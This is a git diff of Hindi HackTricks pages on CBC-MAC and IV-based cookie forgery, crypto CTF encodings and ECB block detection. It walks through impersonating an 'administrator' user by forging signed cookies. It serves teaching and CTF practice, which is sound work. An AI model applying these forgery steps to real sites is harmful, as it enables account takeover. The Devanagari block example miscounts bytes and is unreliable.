+{% endhint %} # CBC -यदि **कुकी** **केवल** **उपयोगकर्ता नाम** है (या कुकी का पहला हिस्सा उपयोगकर्ता नाम है) और आप उपयोगकर्ता "**व्यवस्थापक**" का अनुकरण करना चाहते हैं। तो, आप उपयोगकर्ता नाम **"बीडमिन"** बना सकते हैं और कुकी के **पहले बाइट** का **ब्रूटफोर्स** कर सकते हैं। +अगर **कुकी** **केवल** **उपयोगकर्ता नाम** है (या कुकी का पहला हिस्सा उपयोगकर्ता नाम है) और आप उपयोगकर्ता "**एडमिन**" का अनुकरण करना चाहते हैं। तो, आप उपयोगकर्ता नाम **"बीडमिन"** बना सकते हैं और कुकी के **पहले बाइट** को **ब्रूटफोर्स** कर सकते हैं। # CBC-MAC -रहस्यमयता में, एक **साइफर ब्लॉक चेनिंग संदेश प्रमाणीकरण कोड** (**CBC-MAC**) एक तकनीक है जिसका उपयोग एक ब्लॉक साइफर से संदेश प्रमाणीकरण कोड निर्मित करने के लिए किया जाता है। संदेश को कुछ ब्लॉक साइफर एल्गोरिदम के साथ सीबीसी मोड में एन्क्रिप्ट किया जाता है ताकि प्रत्येक ब्लॉक पिछले ब्लॉक के सही एन्क्रिप्शन पर निर्भर हो। यह आपसी आश्रितता सुनिश्चित करता है कि किसी भी प्लेनटेक्स्ट **बिट्स** में कोई **परिवर्तन** होने पर **अंतिम एन्क्रिप्टेड ब्लॉक** को एक ऐसे तरीके से **परिवर्तित** करेगा जिसे पूर्वानुमान या ब्लॉक साइफर कुंजी को नहीं जानकर नहीं रोका जा सकता। +**साइफर ब्लॉक चेनिंग मैसेज ऑथेंटिकेशन कोड** (**CBC-MAC**) एक विधि है जो गुप्तशास्त्र में प्रयोग की जाती है। यह एक संदेश लेकर उसे ब्लॉक द्वारा एन्क्रिप्ट करने के द्वारा काम करता है, जहां प्रत्येक ब्लॉक की एन्क्रिप्शन पिछले ब्लॉक से जुड़ी होती है। यह प्रक्रिया एक **ब्लॉकों की श्रृंखला** बनाती है, जिससे सुनिश्चित होता है कि मूल संदेश के एक भी बिट को बदलने से एन्क्रिप्ट किए गए डेटा के अंतिम ब्लॉक में एक अप्रत्याशित परिवर्तन होगा। इस परिवर्तन को बनाने या उलटाने के लिए, एन्क्रिप्शन कुंजी की आवश्यकता होती है, जो सुरक्षा सुनिश्चित करता है। -संदेश m का CBC-MAC निर्धारित करने के लिए, किसी भी शून्य प्रारंभीक वेक्टर के साथ m को सीबीसी मोड में एन्क्रिप्ट किया जाता है और अंतिम ब्लॉक को रखा जाता है। निम्न चित्र में एक संदेश का CBC-MAC की गणना करने की रूपरेखा दी गई है![m\_{1}\\|m\_{2}\\|\cdots \\|m\_{x}](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) एक गुप्त कुंजी k और एक ब्लॉक साइफर E के साथ: +संदेश m का CBC-MAC निर्धारित करने के लिए, किसी भी शून्य प्रारंभीक वेक्टर के साथ m को CBC मोड में एन्क्रिप्ट किया जाता है और अंतिम ब्लॉक को रखा जाता है। निम्न चित्र में एक गुप्त कुंजी k और एक ब्लॉक साइफर E का उपयोग करके संदेश का CBC-MAC की गणना की गई है![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5): -![CBC-MAC structure (en).svg](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) +![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png) # सुरक्षा दोष @@ -38,44 +39,45 @@ CBC-MAC के साथ आम तौर पर **इस्तेमाल क * `E(m1 XOR 0) = s31 = s1` * `E(m2 XOR s1) = s32` -**जिसे एन्क्रिप्शन की कुंजी को नहीं जानते हुए गणना किया जा सकता है।** +**जिसे एन्क्रिप्शन की कुंजी को नहीं जानते हुए भी गणना की जा सकती है।** -सोचिए आप **8 बाइट** ब्लॉक में नाम **प्रशासक** को एन्क्रिप्ट कर रहे हैं: +सोचिए आप **8 बाइट** ब्लॉक में नाम **एडमिनिस्ट्रेटर** को एन्क्रिप्ट कर रहे हैं: -* `Administ` -* `rator\00\00\00` +* `एडमिनिस्ट` +* `रेटर\00\00\00` -आप उपयोगकर्ता नाम **Administ** (m1) बना सकते हैं और हस्ताक्षर (s1) प्राप्त कर सकते हैं।\ -फिर, आप `rator\00\00\00 XOR s1` के परिणाम को उपयोगकर्ता नाम बना सकते हैं। यह `E(m2 XOR s1 XOR 0)` उत्पन्न करेगा जो s32 है।\ -अब, आप s32 का उपयोग **प्रशासक** के पूरे नाम के लिए हस्ताक्षर के रूप में कर सकते हैं। +आप उपयोगकर्ता नाम **एडमिनिस्ट** (m1) का हस्ताक्षर (s1) प्राप्त कर सकते हैं।\ +फिर, आप `रेटर\00\00\00 XOR s1` का परिणाम वाला उपयोगकर्ता नाम बना सकते हैं। यह `E(m2 XOR s1 XOR 0)` उत्पन्न करेगा जो s32 है।\ +अब, आप s32 का उपयोग करके पूरे नाम **एडमिनिस्ट्रेटर** का हस्ताक्षर उपयोग कर सकते हैं। ### सारांश -1. उपयोगकर्ता नाम **Administ** (m1) का हस्ताक्षर प्राप्त करें जो s1 है -2. उपयोगकर्ता नाम **rator\x00\x00\x00 XOR s1 XOR 0** का हस्ताक्षर प्राप्त करें जो s32 है**.** -3. कुकी को s32 पर सेट करें और यह उपयोगकर्ता **प्रशासक** के लिए एक मान्य कुकी होगी। +1. उपयोगकर्ता नाम **एडमिनिस्ट** (m1) का हस्ताक्षर प्राप्त करें जो s1 है +2. उपयोगकर्ता नाम **रेटर\x00\x00\x00 XOR s1 XOR 0** का हस्ताक्षर प्राप्त करें जो s32 है**।** +3. कुकी को s32 पर सेट करें और यह उपयोगकर्ता **एडमिनिस्ट्रेटर** के लिए एक मान्य कुकी होगी। # हमला नियंत्रण IV यदि आप उपयोग किए गए IV को नियंत्रित कर सकते हैं तो हमला बहुत आसान हो सकता है।\ -यदि कुकी केवल उपयोगकर्ता नाम एन्क्रिप्ट किया गया है, तो उपयोगकर्ता "**प्रशासक**" का उपयोगकर्ता बना सकते हैं और आप इसकी कुकी प्राप्त करेंगे।\ -अब, यदि आप IV को नियंत्रित कर सकते हैं, तो आप IV का पहला बाइट बदल सकते हैं ताकि **IV\[0] XOR "A" == IV'\[0] XOR "a"** और उपयोगकर्ता **प्रशासक** के लिए कुकी पुनः उत्पन्न कर सकते हैं। यह कुकी **प्रशासक** के उपयोगकर्ता का अनुकरण करने के लिए मान्य होगी। +यदि कुकी केवल उपयोगकर्ता नाम एन्क्रिप्ट किया गया है, तो उपयोगकर्ता "**एडमिनिस्ट्रेटर**" का अनुकरण करने के लिए आप उपयोगकर्ता "**एडमिनिस्ट्रेटर**" बना सकते हैं और आप इसकी कुकी प्राप्त करेंगे।\ +अब, यदि आप IV को नियंत्रित कर सकते हैं, तो आप IV का पहला बाइट बदल सकते हैं ताकि **IV\[0] XOR "A" == IV'\[0] XOR "a"** और उपयोगकर्ता **एडमिनिस्ट्रेटर** के लिए कुकी पुनः उत्पन्न कर सकें। यह कुकी **उपयोगकर्ता एडमिनिस्ट्रेटर** का अनुकरण करने के लिए मान्य होगी। -# संदर्भ +## संदर्भ अधिक जानकारी [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को PRs जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} diff --git a/crypto-and-stego/crypto-ctfs-tricks.md b/crypto-and-stego/crypto-ctfs-tricks.md index 1d3f09226..70cc84ae6 100644 --- a/crypto-and-stego/crypto-ctfs-tricks.md +++ b/crypto-and-stego/crypto-ctfs-tricks.md @@ -1,18 +1,19 @@ -# क्रिप्टो सीटीएफएस ट्रिक्स +# क्रिप्टो सीटीएफ़ ट्रिक्स + +{% hint style="success" %} +**AWS हैकिंग सीखें और प्रैक्टिस करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} ## ऑनलाइन हैश डेटाबेस @@ -28,16 +29,16 @@ HackTricks का समर्थन करने के अन्य तरी * [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5) * [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) -## जादू ऑटोसॉल्वर्स +## मैजिक ऑटोसॉल्वर्स * [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey) -* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (जादू मॉड्यूल) +* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (मैजिक मॉड्यूल) * [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) * [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking) ## एन्कोडर्स -अधिकांश एन्कोडेड डेटा को इन 2 स्रोतों से डीकोड किया जा सकता है: +अधिकांश एन्कोडेड डेटा को इन 2 स्रोतों से डिकोड किया जा सकता है: * [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list) * [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) @@ -58,81 +59,34 @@ HackTricks का समर्थन करने के अन्य तरी ### बेस एन्कोडिंग्स ऑटोसॉल्वर इन सभी बेस को चेक करें: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) - -* **एस्की85** -* `BQ%]q@psCd@rH0l` -* **बेस26** \[_A-Z_] -* `BQEKGAHRJKHQMVZGKUXNT` -* **बेस32** \[_A-Z2-7=_] -* `NBXWYYLDMFZGCY3PNRQQ====` -* **Zबेस32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_] -* `pbzsaamdcf3gna5xptoo====` -* **बेस32 जियोहैश** \[_0-9b-hjkmnp-z_] -* `e1rqssc3d5t62svgejhh====` -* **बेस32 क्रॉकफोर्ड** \[_0-9A-HJKMNP-TV-Z_] -* `D1QPRRB3C5S62RVFDHGG====` -* **बेस32 विस्तारित हेक्साडेसिमल** \[_0-9A-V_] -* `D1NMOOB3C5P62ORFDHGG====` -* **बेस45** \[_0-9A-Z $%\*+-./:_] -* `59DPVDGPCVKEUPCPVD` -* **बेस58 (बिटकॉइन)** \[_1-9A-HJ-NP-Za-km-z_] -* `2yJiRg5BF9gmsU6AC` -* **बेस58 (फ्लिकर)** \[_1-9a-km-zA-HJ-NP-Z_] -* `2YiHqF5bf9FLSt6ac` -* **बेस58 (रिप्पल)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_] -* `pyJ5RgnBE9gm17awU` -* **बेस62** \[_0-9A-Za-z_] -* `g2AextRZpBKRBzQ9` -* **बेस64** \[_A-Za-z0-9+/=_] -* `aG9sYWNhcmFjb2xh` -* **बेस67** \[_A-Za-z0-9-_.!\~\_] -* `NI9JKX0cSUdqhr!p` -* **बेस85 (एस्की85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] -* `BQ%]q@psCd@rH0l` -* **बेस85 (एडोबी)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] -* `<~BQ%]q@psCd@rH0l~>` -* **बेस85 (IPv6 या RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_] -* `Xm4y`V\_|Y(V{dF>\` -* **बेस85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] -* `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d` -* **बेस85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__] -* `Xm4y|V{~Y+V}dF?` -* **बेस91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_] -* `frDg[*jNN!7&BQM` -* **बेस100** \[] -* `👟👦👣👘👚👘👩👘👚👦👣👘` -* **बेस122** \[] -* `4F ˂r0Xmvc` -* **एटम-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_] -* `MIc3KiXa+Ihz+lrXMIc3KbCC` -* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_] +* **हैज़15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_] * `DmPsv8J7qrlKEoY7` -* **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] +* **मेगान35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] * `kLD8iwKsigSalLJ5` -* **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_] +* **जॉंग22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_] * `ayRiIo1gpO+uUc7g` -* **ESAB46** \[] +* **एसएबी46** \[] * `3sHcL2NR8WrT7mhR` -* **MEGAN45** \[] +* **मेगान45** \[] * `kLD8igSXm2KZlwrX` -* **TIGO3FX** \[] +* **टिगो3एफएक्स** \[] * `7AP9mIzdmltYmIP9mWXX` -* **TRIPO5** \[] +* **त्रिपो5** \[] * `UE9vSbnBW6psVzxB` -* **FERON74** \[] +* **फेरोन74** \[] * `PbGkNudxCzaKBm0x` -* **GILA7** \[] +* **गिला7** \[] * `D+nkv8C1qIKMErY1` -* **Citrix CTX1** \[] +* **सिट्रिक्स सीटीएक्स1** \[] * `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` -[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 डेड: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) +[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) -### हैकराइज़ एक्सएस \[_╫Λ↻├☰┏_] +### हैकराइज़एक्सएस \[_╫Λ↻├☰┏_] ``` ╫☐↑Λ↻Λ┏Λ↻☐↑Λ ``` -* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 मरा हुआ: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) +* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 मृत: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) ### मोर्स ``` @@ -176,7 +130,7 @@ ryvkryvkryvkryvkryvkryvkryvk ``` * [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex) -### ASCII85 +### एएससीआई85 ``` <~85DoF85DoF85DoF85DoF85DoF85DoF~> ``` @@ -196,17 +150,17 @@ drnajapajrna ``` ### अफाइन गुप्ताक्षर एन्कोड -पत्र को संख्या में बदलें `(ax+b)%26` (_a_ और _b_ कुंजी हैं और _x_ पत्र है) और परिणाम को फिर से पत्र में बदलें +अक्षर को संख्या में बदलें `(ax+b)%26` (_a_ और _b_ कुंजी हैं और _x_ अक्षर है) और परिणाम को फिर से अक्षर में बदलें ``` krodfdudfrod ``` ### एसएमएस कोड -**मल्टीटैप** [एक अक्षर को बदलता है](https://www.dcode.fr/word-letter-change) जिसे मोबाइल [फोन कीपैड](https://www.dcode.fr/phone-keypad-cipher) पर संबंधित कुंजी कोड द्वारा परिभाषित दोहरी अंकों से बदल दिया जाता है (यह मोड एसएमएस लिखते समय प्रयोग किया जाता है)।\ +**मल्टीटैप** [एक अक्षर को बदलता है](https://www.dcode.fr/word-letter-change) जिसे मोबाइल [फोन की पैड](https://www.dcode.fr/phone-keypad-cipher) पर संबंधित कुंजी कोड द्वारा परिभाषित बार-बार अंकों से बदल दिया जाता है (यह मोड एसएमएस लिखते समय प्रयोग किया जाता है)।\ उदाहरण: 2=A, 22=B, 222=C, 3=D...\ आप इस कोड को पहचान सकते हैं क्योंकि आपको\*\* कई बार दोहराए गए अंक\*\* दिखाई देंगे। -आप इस कोड को डीकोड कर सकते हैं: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) +आप इस कोड को डिकोड कर सकते हैं: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) ### बेकन कोड @@ -221,9 +175,9 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA ## संक्षेपण -**Raw Deflate** और **Raw Inflate** (आप दोनों को साइबरचेफ में पा सकते हैं) डेटा को हेडर के बिना संक्षेपित और विस्तारित कर सकते हैं। +**Raw Deflate** और **Raw Inflate** (आप दोनों को साइबरचेफ में पा सकते हैं) डेटा को हेडर के बिना संक्षेपित और विसंक्षेपित कर सकते हैं। -## सरल क्रिप्टो +## सरल एन्क्रिप्शन ### XOR - ऑटोसॉल्वर @@ -274,22 +228,23 @@ Key: * [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl) * [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy\_BFopensslCTF) -## Tools +## उपकरण * [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) * [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) * [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) +{% hint style="success" %} +AWS हैकिंग सीखें और प्रैक्टिस करें:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP हैकिंग सीखें और प्रैक्टिस करें: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -दूसरे तरीके HackTricks का समर्थन करने के लिए: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें** HackTricks और HackTricks Cloud github repos में PRs सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %} diff --git a/crypto-and-stego/electronic-code-book-ecb.md b/crypto-and-stego/electronic-code-book-ecb.md index eb75adab2..50777827e 100644 --- a/crypto-and-stego/electronic-code-book-ecb.md +++ b/crypto-and-stego/electronic-code-book-ecb.md @@ -1,46 +1,46 @@ +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
- +{% endhint %} # ECB -(ECB) इलेक्ट्रॉनिक कोड बुक - सममित्र एन्क्रिप्शन योजना जो **प्रत्येक ब्लॉक को साफ पाठ के ब्लॉक से बदल देती है**। यह **सरलतम** एन्क्रिप्शन योजना है। मुख्य विचार यह है कि स्पष्ट पाठ को **N बिट के ब्लॉक में विभाजित** किया जाता है (इनपुट डेटा, एन्क्रिप्शन एल्गोरिदम के ब्लॉक का आकार पर निर्भर करता है) और फिर केवल एक ही कुंजी का उपयोग करके प्रत्येक स्पष्ट पाठ के ब्लॉक को एन्क्रिप्ट (डिक्रिप्ट) करना है। +(ECB) इलेक्ट्रॉनिक कोड बुक - सममित एन्क्रिप्शन स्कीम जो **प्रत्येक ब्लॉक को क्लियर पाठ** को **साइपरटेक्स्ट के ब्लॉक से** बदल देता है। यह **सबसे सरल** एन्क्रिप्शन स्कीम है। मुख्य विचार यह है कि क्लियर पाठ को **N बिट के ब्लॉक में विभाजित** किया जाता है (इनपुट डेटा, एन्क्रिप्शन एल्गोरिदम के ब्लॉक का आकार पर निर्भर करता है) और फिर केवल कुंजी का उपयोग करके प्रत्येक क्लियर पाठ के ब्लॉक को एन्क्रिप्ट (डिक्रिप्ट) करना है। ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png) -ECB का उपयोग करने के कई सुरक्षा प्रभाव होते हैं: +ECB का उपयोग करने के कई सुरक्षा प्रभाव हैं: -* **एन्क्रिप्टेड संदेश से ब्लॉक हटा दिए जा सकते हैं** +* **एन्क्रिप्टेड संदेश से ब्लॉक हटा सकते हैं** * **एन्क्रिप्टेड संदेश से ब्लॉक चले जा सकते हैं** # सुरक्षा दोष का पता लगाना -कल्पना करें कि आप कई बार एक एप्लिकेशन में लॉगिन करते हैं और आप **हमेशा एक ही कुकी** प्राप्त करते हैं। यह इसलिए है क्योंकि एप्लिकेशन की कुकी **`<उपयोगकर्ता नाम>|<पासवर्ड>`** है।\ +कल्पना करें आप कई बार एक एप्लिकेशन में लॉगिन करते हैं और आप **हमेशा एक ही कुकी** प्राप्त करते हैं। यह इसलिए है क्योंकि एप्लिकेशन की कुकी **`<उपयोगकर्ता नाम>|<पासवर्ड>`** है।\ फिर, आप नए उपयोगकर्ताओं को उत्पन्न करते हैं, जिनमें दोनों का **लंबा पासवर्ड** है और **लगभग** **एक ही** **उपयोगकर्ता नाम** है।\ -आप पाता लगाते हैं कि **8B के ब्लॉक** जहां **दोनों उपयोगकर्ताओं की जानकारी** समान है, **बराबर** हैं। तब, आपको लगता है कि यह हो सकता है क्योंकि **ECB का उपयोग हो रहा है**। +आप पता लगाते हैं कि **8B के ब्लॉक** जहां 